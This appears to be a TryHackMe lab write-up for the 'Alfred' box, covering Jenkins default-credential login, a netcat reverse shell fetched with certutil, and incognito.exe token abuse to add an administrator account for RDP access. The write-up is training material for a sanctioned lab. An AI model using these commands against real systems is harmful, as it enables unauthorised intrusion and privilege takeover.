Alfred (THM)

come back and find a way to use incognito with direct reverse shell

TryHackMeAlfred Write-Up

topics: web application attacks, active info gathering, powershell, Windows privilege escalation (authentication tokens), jenkins web server

  1. Enumeration

  2. Local Privilege Escalation

  3. Administrator Privilege Escalation

new tools: incognito.exe


initial nmap scan .././ $ip Basic

We have three ports open, HTTP, RDP and another HTTP proxy port. Navigating to the homepage reveals nothing other than this image

On port 8080 we are given a login page

From the nmap scan and the logo on this page, we can confirm the platform on this server is Jenkins. The admin has a poorly configured website and has the login page as the homepage. We can surmise that they did not change the default credentials admin:admin which give us initial access.

Within the projects section of the website we are permitted a command prompt

Local Privilege Escalation

We can use this to download a netcat executable and send a reverse shell to ourselves. Download with certutil.exe, listen on port 53 and send the shell

certutil.exe -urlcache -f %tmp%\nc.exe

%tmp%\nc.exe 53 -e cmd.exe

Administrator Privilege Escalation

Lets first check our privileges and the system information with systeminfo

and whoami /priv | findstr "Enabled"

We have a Windows 7 machine and four distinct privileges, most notably SeDebugPrivilege and SeImpersonatePrivilege which enable us to leverage the incognito exploit. Download the executable file from here and transfer with certutil.exe

This exploit allows us to create any user with administrator privileges

incognito.exe add_user joker laughgas
incognito.exe add_localgroup_user Administrators joker
net user joker | findstr "Local Group"

We can now login via RDP and read the root.txt flag xfreerdp /u:joker /p:laughgas /cert:ignore /v:

Last updated